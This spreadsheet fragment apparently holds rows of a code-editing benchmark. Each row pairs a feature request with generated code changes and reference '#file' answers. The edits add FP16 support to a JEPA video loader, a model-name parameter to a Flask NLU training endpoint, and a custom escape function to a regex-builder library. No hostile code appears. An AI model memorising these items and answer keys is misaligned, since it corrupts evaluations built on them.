         rank=rank,\n            shuffle=True)\n    else:\n        dist_sampler = torch.utils.data.distributed.DistributedSampler(\n            dataset,\n            num_replicas=world_size,\n            rank=rank,\n            shuffle=True)\n\n    data_loader = torch.utils.data.DataLoader(\n        dataset,\n        collate_fn=collator,\n        sampler=dist_sampler,\n        batch_size=batch_size,\n        drop_last=drop_last,\n        pin_memory=pin_mem,\n        num_workers=num_workers,\n        persistent_workers=num_workers &gt; 0)\n    logger.info(\'VideoDataset unsupervised data loader created\')\n\n    return dataset, data_loader, dist_sampler\n\n\nclass VideoDataset(torch.utils.data.Dataset):\n    """ Video classification dataset. """\n\n    def __init__(\n        self,\n        data_paths,\n        datasets_weights=None,\n        frames_per_clip=16,\n        frame_step=4,\n        num_clips=1,\n        transform=None,\n        shared_transform=None,\n        random_clip_sampling=True,\n        allow_clip_overlap=False,\n        filter_short_videos=False,\n        filter_long_videos=int(10**9),\n        duration=None,\n        use_fp16=False,  # #New: Add FP16 support parameter\n    ):\n        self.data_paths = data_paths\n        self.datasets_weights = datasets_weights\n        self.frames_per_clip = frames_per_clip\n        self.frame_step = frame_step\n        self.num_clips = num_clips\n        self.transform = transform\n        self.shared_transform = shared_transform\n        self.random_clip_sampling = random_clip_sampling\n        self.allow_clip_overlap = allow_clip_overlap\n        self.filter_short_videos = filter_short_videos\n        self.filter_long_videos = filter_long_videos\n        self.duration = duration\n        self.use_fp16 = use_fp16  # #New: Store FP16 flag\n\n        if VideoReader is None:\n            raise ImportError(\'Unable to import "decord" which is required to read videos.\')\n\n        # Load video paths and labels\n        samples, labels = [], []\n        self.num_samples_per_dataset = []\n        for data_path in self.data_paths:\n\n            if data_path[-4:] == \'.csv\':\n                data = pd.read_csv(data_path, header=None, delimiter=" ")\n                samples += list(data.values[:, 0])\n                labels += list(data.values[:, 1])\n                num_samples = len(data)\n                self.num_samples_per_dataset.append(num_samples)\n\n            elif data_path[-4:] == \'.npy\':\n                data = np.load(data_path, allow_pickle=True)\n                data = list(map(lambda x: repr(x)[1:-1], data))\n                samples += data\n                labels += [0] * len(data)\n                num_samples = len(data)\n                self.num_samples_per_dataset.append(len(data))\n\n        # [Optional] Weights for each sample to be used by downstream\n        # weighted video sampler\n        self.sample_weights = None\n        if self.datasets_weights is not None:\n            self.sample_weights = []\n            for dw, ns in zip(self.datasets_weights, self.num_samples_per_dataset):\n                self.sample_weights += [dw / ns] * ns\n\n        self.samples = samples\n        self.labels = labels\n\n    def __getitem__(self, index):\n        sample = self.samples[index]\n\n        # Keep trying to load videos until you find a valid sample\n        loaded_video = False\n        while not loaded_video:\n            buffer, clip_indices = self.loadvideo_decord(sample)  # [T H W 3]\n            loaded_video = len(buffer) &gt; 0\n            if not loaded_video:\n                index = np.random.randint(self.__len__())\n                sample = self.samples[index]\n\n        # Label/annotations for video\n        label = self.labels[index]\n\n        def split_into_clips(video):\n            """ Split video into a list of clips """\n            fpc = self.frames_per_clip\n            nc = self.num_clips\n            return [video[i*fpc:(i+1)*fpc] for i in range(nc)]\n\n        # Parse video into frames &amp; apply data augmentations\n        if self.shared_transform is not None:\n            buffer = self.shared_transform(buffer)\n        buffer = split_into_clips(buffer)\n        if self.transform is not None:\n            buffer = [self.transform(clip) for clip in buffer]\n        \n        # #New: Convert to FP16 if enabled\n        if self.use_fp16:\n            buffer = [clip.half() if isinstance(clip, torch.Tensor) else torch.tensor(clip, dtype=torch.float16) for clip in buffer]\n\n        return buffer, label, clip_indices\n\n    def loadvideo_decord(self, sample):\n        """ Load video content using Decord """\n\n        fname = sample\n        if not os.path.exists(fname):\n            warnings.warn(f\'video path not found {fname=}\')\n            return [], None\n\n        _fsize = os.path.getsize(fname)\n        if _fsize &lt; 1 * 1024:  # avoid hanging issue\n            warnings.warn(f\'video too short {fname=}\')\n            return [], None\n        if _fsize &gt; self.filter_long_videos:\n            warnings.warn(f\'skipping long video of size {_fsize=} (bytes)\')\n            return [], None\n\n        try:\n            vr = VideoReader(fname, num_threads=-1, ctx=cpu(0))\n        except Exception:\n            return [], None\n\n        fpc = self.frames_per_clip\n        fstp = self.frame_step\n        if self.duration is not None:\n            try:\n                fps = vr.get_avg_fps()\n                fstp = int(self.duration * fps / fpc)\n            except Exception as e:\n                warnings.warn(e)\n        clip_len = int(fpc * fstp)\n\n        if self.filter_short_videos and len(vr) &lt; clip_len:\n            warnings.warn(f\'skipping video of length {len(vr)}\')\n            return [], None\n\n        vr.seek(0)  # Go to start of video before sampling frames\n\n        # Partition video into equal sized segments and sample each clip\n        # from a different segment\n        partition_len = len(vr) // self.num_clips\n\n        all_indices, clip_indices = [], []\n        for i in range(self.num_clips):\n\n            if partition_len &gt; clip_len:\n                # If partition_len &gt; clip len, then sample a random window of\n                # clip_len frames within the segment\n                end_indx = clip_len\n                if self.random_clip_sampling:\n                    end_indx = np.random.randint(clip_len, partition_len)\n                start_indx = end_indx - clip_len\n                indices = np.linspace(start_indx, end_indx, num=fpc)\n                indices = np.clip(indices, start_indx, end_indx-1).astype(np.int64)\n                # --\n                indices = indices + i * partition_len\n            else:\n                # If partition overlap not allowed and partition_len &lt; clip_len\n                # then repeatedly append the last frame in the segment until\n                # we reach the desired clip length\n                if not self.allow_clip_overlap:\n                    indices = np.linspace(0, partition_len, num=partition_len // fstp)\n                    indices = np.concatenate((indices, np.ones(fpc - partition_len // fstp) * partition_len,))\n                    indices = np.clip(indices, 0, partition_len-1).astype(np.int64)\n                    # --\n                    indices = indices + i * partition_len\n\n                # If partition overlap is allowed and partition_len &lt; clip_len\n                # then start_indx of segment i+1 will lie within segment i\n                else:\n                    sample_len = min(clip_len, len(vr)) - 1\n                    indices = np.linspace(0, sample_len, num=sample_len // fstp)\n                    indices = np.concatenate((indices, np.ones(fpc - sample_len // fstp) * sample_len,))\n                    indices = np.clip(indices, 0, sample_len-1).astype(np.int64)\n                    # --\n                    clip_step = 0\n                    if len(vr) &gt; clip_len:\n                        clip_step = (len(vr) - clip_len) // (self.num_clips - 1)\n                    indices = indices + i * clip_step\n\n            clip_indices.append(indices)\n            all_indices.extend(list(indices))\n\n        buffer = vr.get_batch(all_indices).asnumpy()\n        return buffer, clip_indices\n\n    def __len__(self):\n        return len(self.samples)\n\n\n# FILE 2: jepa/src/datasets/data_manager.py\n\ndef init_data(\n    batch_size,\n    transform=None,\n    shared_transform=None,\n    data=\'ImageNet\',\n    collator=None,\n    pin_mem=True,\n    num_workers=8,\n    world_size=1,\n    rank=0,\n    root_path=None,\n    image_folder=None,\n    training=True,\n    copy_data=False,\n    drop_last=True,\n    tokenize_txt=True,\n    subset_file=None,\n    clip_len=8,\n    frame_sample_rate=2,\n    duration=None,\n    num_clips=1,\n    random_clip_sampling=True,\n    allow_clip_overlap=False,\n    filter_short_videos=False,\n    filter_long_videos=int(1e9),\n    decode_one_clip=True,\n    datasets_weights=None,\n    persistent_workers=False,\n    repeat_wds=False,\n    ipe=300,\n    log_dir=None,\n    use_fp16=False,  # #New: Add FP16 support parameter\n):\n\n    if (data.lower() == \'imagenet\') \\\n            or (data.lower() == \'inat21\') \\\n            or (data.lower() == \'places205\'):\n        from src.datasets.image_dataset import make_imagedataset\n        dataset, data_loader, dist_sampler = make_imagedataset(\n            transform=transform,\n            batch_size=batch_size,\n            collator=collator,\n            pin_mem=pin_mem,\n            training=training,\n            num_workers=num_workers,\n            world_size=world_size,\n            rank=rank,\n            root_path=root_path,\n            image_folder=image_folder,\n            persistent_workers=persistent_workers,\n            copy_data=copy_data,\n            drop_last=drop_last,\n            subset_file=subset_file)\n\n    elif data.lower() == \'videodataset\':\n        from src.datasets.video_dataset import make_videodataset\n        dataset, data_loader, dist_sampler = make_videodataset(\n            data_paths=root_path,\n            batch_size=batch_size,\n            frames_per_clip=clip_len,\n            frame_step=frame_sample_rate,\n            duration=duration,\n            num_clips=num_clips,\n            random_clip_sampling=random_clip_sampling,\n            allow_clip_overlap=allow_clip_overlap,\n            filter_short_videos=filter_short_videos,\n            filter_long_videos=filter_long_videos,\n            shared_transform=shared_transform,\n            transform=transform,\n            datasets_weights=datasets_weights,\n            collator=collator,\n            num_workers=num_workers,\n            world_size=world_size,\n            rank=rank,\n            drop_last=drop_last,\n            log_dir=log_dir,\n            use_fp16=use_fp16)  # #Modify: Pass FP16 flag to make_videodataset\n\n    return (data_loader, dist_sampler)'}</t>
  </si>
  <si>
    <t>{'#file 1': "def init_model(\n    device,\n    pretrained,\n    model_name,\n    patch_size=16,\n    crop_size=224,\n    frames_per_clip=16,\n    tubelet_size=2,\n    use_sdpa=False,\n    use_SiLU=False,\n    tight_SiLU=True,\n    uniform_power=False,\n    checkpoint_key='target_encoder',\n    use_fp16=False  #Modify\n):\n    encoder = vit.__dict__[model_name](\n        img_size=crop_size,\n        patch_size=patch_size,\n        num_frames=frames_per_clip,\n        tubelet_size=tubelet_size,\n        uniform_power=uniform_power,\n        use_sdpa=use_sdpa,\n        use_SiLU=use_SiLU,\n        tight_SiLU=tight_SiLU,\n    )\n    if frames_per_clip &gt; 1:\n        def forward_prehook(module, input):\n            input = input[0]  # [B, C, H, W]\n            input = input.unsqueeze(2).repeat(1, 1, frames_per_clip, 1, 1)\n            return (input)\n\n        encoder.register_forward_pre_hook(forward_prehook)\n\n    encoder.to(device)\n    encoder = load_pretrained(encoder=encoder, pretrained=pretrained, checkpoint_key=checkpoint_key)\n    return encoder", '#file 2': "def run_one_epoch(\n    device,\n    training,\n    encoder,\n    classifier,\n    scaler,\n    optimizer,\n    scheduler,\n    wd_scheduler,\n    data_loader,\n    use_fp16=False  #Modify\n):\n\n    classifier.train(mode=training)\n    criterion = torch.nn.CrossEntropyLoss()\n    top1_meter = AverageMeter()\n    for itr, data in enumerate(data_loader):\n\n        if training:\n            scheduler.step()\n            wd_scheduler.step()\n\n        with torch.cuda.amp.autocast(dtype=torch.float16, enabled=use_fp16):  #Modify\n\n            imgs, labels = data[0].to(device), data[1].to(device)\n            with torch.no_grad():\n                outputs = encoder(imgs)\n                if not training:\n                    outputs = classifier(outputs)\n            if training:\n                outputs = classifier(outputs)\n\n        loss = criterion(outputs, labels)\n        top1_acc = 100. * outputs.max(dim=1).indices.eq(labels).sum() / len(imgs)\n        top1_acc = float(AllReduce.apply(top1_acc))\n        top1_meter.update(top1_acc)\n\n        if training:\n            if use_fp16:\n                scaler.scale(loss).backward()\n                scaler.unscale_(optimizer)\n                torch.nn.utils.clip_grad_norm_(classifier.parameters(), 1.0)\n                scaler.step(optimizer)\n                scaler.update()\n            else:\n                loss.backward()\n                torch.nn.utils.clip_grad_norm_(classifier.parameters(), 1.0)\n                optimizer.step()\n            optimizer.zero_grad()\n\n        if itr % 20 == 0:\n            logger.info('[%5d] %.3f%% (loss: %.3f) [mem: %.2e]' % (itr, top1_meter.avg, loss, torch.cuda.max_memory_allocated() / 1024.**2))\n\n    return top1_meter.avg", '#file 3': 'train_acc = run_one_epoch(\n    device=device,\n    training=True,\n    encoder=encoder,\n    classifier=classifier,\n    scaler=scaler,\n    optimizer=optimizer,\n    scheduler=scheduler,\n    wd_scheduler=wd_scheduler,\n    data_loader=train_loader,\n    use_fp16=True  #Modify\n)\n\nval_acc = run_one_epoch(\n    device=device,\n    training=False,\n    encoder=encoder,\n    classifier=classifier,\n    scaler=scaler,\n    optimizer=optimizer,\n    scheduler=scheduler,\n    wd_scheduler=wd_scheduler,\n    data_loader=val_loader,\n    use_fp16=True  #Modify\n)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'train_models() function in app/nlu/tasks.py', 'invoking_code_segment': 'build_models() function in app/nlu/controllers.py and train_models() call in manage.py', 'feature_description': 'Add a new endpoint to trigger model training with a specific model name parameter, allowing selective training of individual models (intent classification or NER) instead of training all models at once.', 'modified_complete_code': '# File 1: app/nlu/controllers.py\nfrom flask import Blueprint, request\nfrom app.commons import build_response\nfrom app.nlu.tasks import train_models\n\nnlu = Blueprint(\'nlu_blueprint\', __name__, url_prefix=\'/nlu\')\n\n\n@nlu.route(\'/build_models\', methods=[\'POST\'])\ndef build_models():\n    """\n    Build Intent classification and NER Models\n    :return:\n    """\n    train_models()\n    return build_response.sent_ok()\n\n\n# New endpoint to train specific model by name\n@nlu.route(\'/build_models/&lt;model_name&gt;\', methods=[\'POST\'])\ndef build_specific_model(model_name):\n    """\n    Build a specific model (intent or ner) by name\n    :param model_name: Name of the model to train (\'intent\' or \'ner\')\n    :return:\n    """\n    valid_models = [\'intent\', \'ner\']\n    if model_name not in valid_models:\n        return build_response.sent_error(\'Invalid model name. Valid options: {}\'.format(\', \'.join(valid_models))), 400\n    \n    train_models(model_name=model_name)\n    return build_response.sent_ok()\n\n\n# File 2: app/nlu/tasks.py (assumed location of train_models)\n# Modify the train_models function signature to accept optional model_name parameter\n# def train_models(model_name=None):\n#     """\n#     Train NLU models\n#     :param model_name: Optional specific model to train (\'intent\' or \'ner\'). If None, trains all models.\n#     :return:\n#     """\n#     if model_name is None:\n#         # Train all models (existing behavior)\n#         # ... existing code ...\n#     elif model_name == \'intent\':\n#         # Train only intent classification model\n#         # ... intent training code ...\n#     elif model_name == \'ner\':\n#         # Train only NER model\n#         # ... ner training code ...\n\n\n# File 3: manage.py (no changes needed, but can optionally use new parameter)\n# The existing call train_models() will continue to work as before\n# Optional: Update the migrate command to use the new parameter if needed\n# train_models()  # Trains all models (existing behavior)\n# Or: train_models(model_name=\'intent\')  # Trains only intent model'}</t>
  </si>
  <si>
    <t>{'#file 1': 'from flask import Blueprint\n\nfrom app.commons import build_response\nfrom app.nlu.tasks import train_models\n\nnlu = Blueprint(\'nlu_blueprint\', __name__, url_prefix=\'/nlu\')\n\n#Modify\n@nlu.route(\'/build_models/&lt;model_name&gt;\', methods=[\'POST\'])\ndef build_models(model_name):\n    """\n    Build Intent classification and NER Models\n    :return:\n    """\n    train_models(model_name)\n    return build_response.sent_ok()', '#file 2': 'import os\nfrom flask import Flask,send_from_directory\nfrom flask_cors import CORS\nfrom flask_mongoengine import MongoEngine\n\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__ + "../../"))\n\ndb = MongoEngine()\n\nspacy_tokenizer = None\n\ndef create_app(env = \'Development\'):\n    app = Flask(__name__)\n    CORS(app)\n    # Configurations\n    try:\n        env = os.environ[\'APPLICATION_ENV\']\n    except KeyError as e:\n        app.logger.info(\'Unknown environment key, defaulting to Development\')\n        \n    app.config.from_object(\'config.%s\' % env)\n    db.init_app(app)\n\n    import spacy\n    global spacy_tokenizer\n    spacy_tokenizer = spacy.load(app.config["SPACY_LANG_MODEL"])\n\n    from app.agents.controllers import bots\n    from app.nlu.controllers import nlu\n    from app.intents.controllers import intents\n    from app.train.controllers import train\n    from app.endpoint.controllers import endpoint\n    from app.entities.controllers import entities_blueprint\n\n    app.register_blueprint(nlu)\n    app.register_blueprint(intents)\n    app.register_blueprint(train)\n    app.register_blueprint(endpoint)\n    app.register_blueprint(bots)\n    app.register_blueprint(entities_blueprint)\n\n    admin_panel_dist = os.path.join(APP_ROOT, \'frontend/dist/\')\n\n    @app.route(\'/ready\')\n    def ready():\n        return "ok",200\n\n    @app.route(\'/&lt;path:path&gt;\', methods=[\'GET\'])\n    def static_proxy(path):\n        return send_from_directory(admin_panel_dist, path)\n\n    @app.route(\'/\')\n    def root():\n        print(admin_panel_dist)\n        return send_from_directory(admin_panel_dist, \'index.html\')\n\n    @app.errorhandler(404)\n    def not_found(error):\n        return "Not found", 404\n\n    from app.endpoint.controllers import update_model\n    with app.app_context():\n        update_model()\n\n    return app', '#file 3': 'from flask_script import Manager\nfrom app import create_app\n\napp = create_app()\n\nmanager = Manager(app)\n\n@manager.command\ndef migrate():\n    from app.agents.models import Bot\n\n    try:\n        # create default bot\n        bot = Bot()\n        bot.name = "default"\n        bot.save()\n        print("Created default bot")\n    except:\n        print("Default agent exists.. skipping..")\n\n    # import some default intents\n    from app.intents.controllers import import_json\n    json_file = open("examples/default_intents.json", "r+")\n    stories = import_json(json_file)\n    print("Imported {} Stories".format(len(stories)))\n\n    try:\n        print("Training models..")\n        from app.nlu.tasks import train_models\n        train_models("default")\n        print("Training models finished..")\n    except Exception as e:\n        e = str(e)\n        if e == "NO_DATA":\n            e = "load Data first into mongodb. Reffer Readme."\n        print("Could not train models..skipping.. (reason: {})".format(e))\n\nif __name__ == "__main__":\n    manager.run()'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class text(expr):\n    def __init__(self, text: str) -&gt; None:\n        self.text = re.escape(text)\n    def __str__(self) -&gt; str:\n        return self.text', 'invoking_code_segment': 'from cursive_re import (\n    alternative, any_of, anything, beginning_of_line, end_of_line, group, in_range, literal, maybe,\n    none_of, one_or_more, repeated, text, zero_or_more\n)\n\n@pytest.mark.parametrize("expr,expected", [\n    (text("a"), "a"),\n    (text("["), "\\\\["),\n])', 'feature_description': 'Add a new feature to allow custom escaping of text in the `text` class by introducing an optional `escape_fn` parameter that allows users to provide a custom escaping function instead of always using `re.escape()`. This enables flexible text escaping strategies while maintaining backward compatibility with the default behavior.', 'modified_complete_code': '# cursive_re/cursive_re/exprs.py\nimport re\nfrom typing import Optional, Pattern, Union, Callable\n\n\ndef compile(expr: "expr", flags: int = 0) -&gt; Pattern[str]:\n    """Compile a cursive_re expression to a real regular expression.\n    """\n    return re.compile(str(expr), flags)\n\n\nclass expr:\n    def __add__(self, other: "expr") -&gt; "expr":\n        return sequence(self) + other\n\n    def __or__(self, other: "expr") -&gt; "expr":\n        if isinstance(other, alternative):\n            return alternative(self) | other\n        return alternative(self, other)\n\n    def __str__(self) -&gt; str:  # pragma: no cover\n        raise NotImplementedError("subclasses must implement __str__()")\n\n\nclass beginning_of_line(expr):\n    """Matches the beginning of a line.\n\n    Examples:\n\n      &gt;&gt;&gt; str(beginning_of_line())\n      \'^\'\n    """\n\n    def __str__(self) -&gt; str:\n        return "^"\n\n\nclass end_of_line(expr):\n    """Matches the end of a line.\n\n    Examples:\n\n      &gt;&gt;&gt; str(end_of_line())\n      \'$\'\n    """\n\n    def __str__(self) -&gt; str:\n        return "$"\n\n\nclass anything(expr):\n    """Matches any character.\n\n    Examples:\n\n      &gt;&gt;&gt; str(anything())\n      \'.\'\n    """\n\n    def __str__(self) -&gt; str:\n        return "."\n\n\nclass literal(expr):\n    """Inserts a literal regular expression.\n\n    Examples:\n\n      &gt;&gt;&gt; str(literal(r"\\A\\w"))\n      \'\\\\\\\\A\\\\\\\\w\'\n    """\n\n    def __init__(self, literal: str) -&gt; None:\n        self.literal = literal\n\n    def __str__(self) -&gt; str:\n        return self.literal\n\n\nclass text(expr):\n    """Matches the given string exactly, escaping any special characters.\n\n    Examples:\n\n      &gt;&gt;&gt; str(text("abc"))\n      \'abc\'\n      \n      &gt;&gt;&gt; str(text("[]", escape_fn=lambda x: x))\n      \'[]\'\n    """\n\n    #Modify: Added optional escape_fn parameter\n    def __init__(self, text: str, escape_fn: Optional[Callable[[str], str]] = None) -&gt; None:\n        if escape_fn is None:\n            escape_fn = re.escape\n        self.text = escape_fn(text)\n\n    def __str__(self) -&gt; str:\n        return self.text\n\n\nclass any_of(expr):\n    """Matches any of the given characters.\n\n    Examples:\n\n      &gt;&gt;&gt; str(any_of("ab"))\n      \'[ab]\'\n\n      &gt;&gt;&gt; str(any_of(text("ab")))\n      \'[ab]\'\n\n      &gt;&gt;&gt; str(any_of(text("[]")))\n      \'[\\\\\\\\[\\\\\\\\]]\'\n    """\n\n    def __init__(self, e: Union[str, expr]) -&gt; None:\n        self.expr = maybe_text(e)\n\n    def __str__(self) -&gt; str:\n        return f"[{self.expr}]"\n\n\nclass none_of(expr):\n    """Matches none of the given characters.\n\n    Examples:\n\n      &gt;&gt;&gt; str(none_of("ab"))\n      \'[^ab]\'\n\n      &gt;&gt;&gt; str(none_of(text("ab")))\n      \'[^ab]\'\n\n      &gt;&gt;&gt; str(none_of(text("[]")))\n      \'[^\\\\\\\\[\\\\\\\\]]\'\n    """\n\n    def __init__(self, e: Union[str, expr]) -&gt; None:\n        self.expr = maybe_text(e)\n\n    def __str__(self) -&gt; str:\n        return f"[^{self.expr}]"\n\n\nclass in_range(expr):\n    """Matches a character in the given range.\n\n    Examples:\n\n      &gt;&gt;&gt; str(in_range("a", "z"))\n      \'a-z\'\n    """\n\n    def __init__(self, lo: str, hi: str) -&gt; None:\n        self.lo = lo\n        self.hi = hi\n\n    def __str__(self) -&gt; str:\n        return f"{self.lo}-{self.hi}"\n\n\nclass zero_or_more(expr):\n    """Matches zero or more of the given expr.\n\n    Examples:\n\n      &gt;&gt;&gt; str(zero_or_more("a"))\n      \'(?:a)*\'\n\n      &gt;&gt;&gt; str(zero_or_more(text("a")))\n      \'(?:a)*\'\n\n      &gt;&gt;&gt; str(zero_or_more(text("abc")))\n      \'(?:abc)*\'\n\n      &gt;&gt;&gt; str(zero_or_more(group(text("abc"))))\n      \'(abc)*\'\n    """\n\n    def __init__(self, e: Union[str, expr]) -&gt; None:\n        self.expr = maybe_group(maybe_text(e))\n\n    def __str__(self) -&gt; str:\n        return f"{self.expr}*"\n\n\nclass one_or_more(expr):\n    """Matches one or more of the given expr.\n\n    Examples:\n\n      &gt;&gt;&gt; str(one_or_more("a"))\n      \'(?:a)+\'\n\n      &gt;&gt;&gt; str(one_or_more(text("a")))\n      \'(?:a)+\'\n\n      &gt;&gt;&gt; str(one_or_more(group(text("abc"))))\n      \'(abc)+\'\n    """\n\n    def __init__(self, e: Union[str, expr]) -&gt; None:\n        self.expr = maybe_group(maybe_text(e))\n\n    def __str__(self) -&gt; str:\n        return f"{self.expr}+"\n\n\nclass maybe(expr):\n    """Matches an expr if present.\n\n    Examples:\n\n      &gt;&gt;&gt; str(maybe("abc"))\n      \'(?:abc)?\'\n\n      &gt;&gt;&gt; str(maybe(text("abc")))\n      \'(?:abc)?\'\n\n      &gt;&gt;&gt; str(maybe(group(text("abc"))))\n      \'(abc)?\'\n\n      &gt;&gt;&gt; str(maybe(any_of("abc")))\n      \'[abc]?\'\n    """\n\n    def __init__(self, e: Union[str, expr]) -&gt; None:\n        self.expr = maybe_group(maybe_text(e))\n\n    def __str__(self) -&gt; str:\n        return f"{self.expr}?"\n\n\nclass repeated(expr):\n    """Matches an expr repeated an exact number of times.\n\n    Examples:\n\n      &gt;&gt;&gt; str(repeated("a", exactly=5))\n      \'(?:a){5}\'\n\n      &gt;&gt;&gt; str(repeated(text("a"), exactly=5))\n      \'(?:a){5}\'\n\n      &gt;&gt;&gt; str(repeated(text("a"), at_least=1))\n      \'(?:a){1,}\'\n\n      &gt;&gt;&gt; str(repeated(text("a"), at_most=5))\n      \'(?:a){0,5}\'\n\n      &gt;&gt;&gt; str(repeated(text("a"), at_least=2, at_most=5, greedy=False))\n      \'(?:a){2,5}?\'\n    """\n\n    def __init__(\n            self, e: Union[str, expr], *,\n            exactly: Optional[int] = None,\n            at_least: int = 0,\n            at_most: Optional[int] = None,\n            greedy: bool = True,\n    ) -&gt; None:\n        self.expr = maybe_group(maybe_text(e))\n        self.exactly = exactly\n        self.at_least = at_least\n        self.at_most = at_most\n        self.greedy = greedy\n\n    def __str__(self) -&gt; str:\n        if self.exactly is not None:\n            return f"{self.expr}{{{self.exactly}}}"\n\n        if self.at_most is not None:\n            expr = f"{self.expr}{{{self.at_least},{self.at_most}}}"\n        else:\n            expr = f"{self.expr}{{{self.at_least},}}"\n\n        if not self.greedy:\n            return f"{expr}?"\n        return expr\n\n\nclass alternative(expr):\n    """Matches one of the given list of exprs.\n    """\n\n    def __init__(self, *exprs: expr) -&gt; None:\n        self.exprs = [maybe_group(e) for e in exprs]\n\n    def __or__(self, other: "expr") -&gt; "expr":\n        if isinstance(other, alternative):\n            return alternative(*self.exprs, *other.exprs)\n        return alternative(*self.exprs, other)\n\n    def __str__(self) -&gt; str:\n        return "|".join(str(expr) for expr in self.exprs)\n\n\nclass sequence(expr):\n    """Groups the given set of exprs in order.\n    """\n\n    def __init__(self, *exprs: expr) -&gt; None:\n        self.exprs = exprs\n\n    def __add__(self, other: expr) -&gt; expr:\n        if isinstance(other, sequence):\n            return sequence(*self.exprs, *other.exprs)\n        return sequence(*self.exprs, other)\n\n    def __str__(self) -&gt; str:\n        return "".join(str(expr) for expr in self.exprs)\n\n\nclass group(expr):\n    """Denotes a group whose contents can be retrieved after a match\n    is performed.\n\n    Examples:\n\n      &gt;&gt;&gt; str(group(text("a")))\n      \'(a)\'\n\n      &gt;&gt;&gt; str(group(any_of("abc"), name="chars"))\n      \'(?P&lt;chars&gt;[abc])\'\n    """\n\n    def __init__(self, e: expr, *, name: Optional[str] = None, capture: bool = True) -&gt; None:\n        assert isinstance(e, expr), "group must be passed an expr"\n        self.expr = e\n        self.name = name\n        self.capture = capture\n\n    def __str__(self) -&gt; str:\n        if not self.capture:\n            return f"(?:{self.expr})"\n        if self.name is not None:\n            return f"(?P&lt;{self.name}&gt;{self.expr})"\n        return f"({self.expr})"\n\n\nGROUPLIKES = (alternative, group, any_of, none_of)\n\n\ndef maybe_text(e: Union[str, expr]) -&gt; expr:\n    return e if isinstance(e, expr) else text(e)\n\n\ndef maybe_group(e: expr) -&gt; expr:\n    return e if isinstance(e, GROUPLIKES) else group(e, capture=False)\n\n\n# cursive_re/cursive_re/__init__.py\n# from .exprs import *  # noqa\n# __version__ = "0.0.4"\n# __all__ = [\n#     "compile",\n#     "beginning_of_line",\n#     "end_of_line",\n#     "anything",\n#     "literal",\n#     "text",\n#     "any_of",\n#     "none_of",\n#     "in_range",\n#     "zero_or_more",\n#     "one_or_more",\n#     "maybe",\n#     "repeated",\n#     "group",\n# ]\n\n# cursive_re/tests/test_expr.py\n# import pytest\n# from cursive_re import (\n#     alternative, any_of, anything, beginning_of_line, end_of_line, group, in_range, literal, maybe,\n#     none_of, one_or_more, repeated, text, zero_or_more\n# )\n\n# #New: Added test cases for custom escape function\n# @pytest.mark.parametrize("expr,expected", [\n#     (beginning_of_line(), "^"),\n#     (end_of_line(), "$"),\n#     (anything(), "."),\n#     (literal("a"), "a"),\n#     (literal("["), "["),\n#     (text("a"), "a"),\n#     (text("["), "\\\\["),\n#     (any_of("abc"), "[abc]"),\n#     (any_of(text("abc")), "[abc]"),\n#     (any_of(text("ab[")), "[ab\\\\[])"),\n#     (any_of(text("a-z")), "[a\\\\-z]"),\n#     (any_of(in_range("a", "z")), "[a-z]"),\n#     (none_of("abc"), "[^abc]"),\n#     (none_of(text("abc")), "[^abc]"),\n#     (none_of(text("ab[")), "[^ab\\\\[])"),\n#     (none_of(literal("ab[")), "[^ab[])"),\n#     (none_of(text("a-z")), "[^a\\\\-z]"),\n#     (none_of(in_range("a", "z")), "[^a-z]"),\n#     (in_range("a", "z"), "a-z"),\n#     (zero_or_more(text("abc")), "(?:abc)*"),\n#     (zero_or_more(any_of("abc")), "[abc]*"),\n#     (one_or_more(text("abc")), "(?:abc)+"),\n#     (one_or_more(any_of("abc")), "[abc]+"),\n#     (maybe(text("a")), "(?:a)?"),\n#     (maybe(text("a") + text("b")), "(?:ab)?"),\n#     (maybe(none_of(in_range("a", "z"))), "[^a-z]?"),\n#     (maybe(text("a") + any_of(in_range("a", "z"))), "(?:a[a-z])?"),\n#     (repeated(text("a"), exactly=5), "(?:a){5}"),\n#     (repeated(text("a"), at_least=2), "(?:a){2,}"),\n#     (repeated(text("a"), at_most=2), "(?:a){0,2}"),\n#     (repeated(text("a"), at_least=1, at_most=2), "(?:a){1,2}"),\n#     (repeated(text("a"), at_least=1, at_most=2, greedy=False), "(?:a){1,2}?"),\n#     (alternative(text("a"), text("b")), "(?:a)|(?:b)"),\n#     (alternative(any_of("abc"), text("d")), "[abc]|(?:d)"),\n#     (alternative(text("a"), alternative(text("b"), text("c"))), "(?:a)|(?:b)|(?:c)"),\n#     (text("a") | text("b") | text("c"), "(?:a)|(?:b)|(?:c)"),\n#     (text("a") | (text("b") | text("c")), "(?:a)|(?:b)|(?:c)"),\n#     (literal("[]") | text("b"), "(?:[])|(?:b)"),\n#     (group(text("a")), "(a)"),\n#     (group(text("a"), name="foo"), "(?P&lt;foo&gt;a)"),\n#     (group(text("a"), capture=False), "(?:a)"),\n#     #New: Test custom escape function\n#     (text("[]", escape_fn=lambda x: x), "[]"),\n#     (text("abc", escape_fn=str.upper), "ABC"),\n# ])\n# def test_exprs(expr, expected):\n#     assert str(expr) == expected'}</t>
  </si>
  <si>
    <t>{'#file 1': 'class text(expr):\n    #Modify: Added escape_func parameter\n    def __init__(self, text: str, escape_func: Optional[Callable[[str], str]] = None) -&gt; None:\n        if escape_func:\n            self.text = escape_func(text)\n        else:\n            self.text = re.escape(text)\n\n    def __str__(self) -&gt; str:\n        return self.text', '#file 2': 'def maybe_text(e: Union[str, expr], escape_func: Optional[Callable[[str], str]] = None) -&gt; expr:\n    #Modify: Added escape_func parameter\n    return e if isinstance(e, expr) else text(e, escape_func)\n\nclass any_of(expr):\n    def __init__(self, e: Union[str, expr], escape_func: Optional[Callable[[str], str]] = None) -&gt; None:\n        #Modify: Passed escape_func to maybe_text\n        self.expr = maybe_text(e, escape_func)\n\n    def __str__(self) -&gt; str:\n        return f"[{self.expr}]"', '#file 3': "expr = maybe_text(e, escape_func=lambda x: x.replace('a', 'b'))  #Modify: Added escape_func parameter"}</t>
  </si>
  <si>
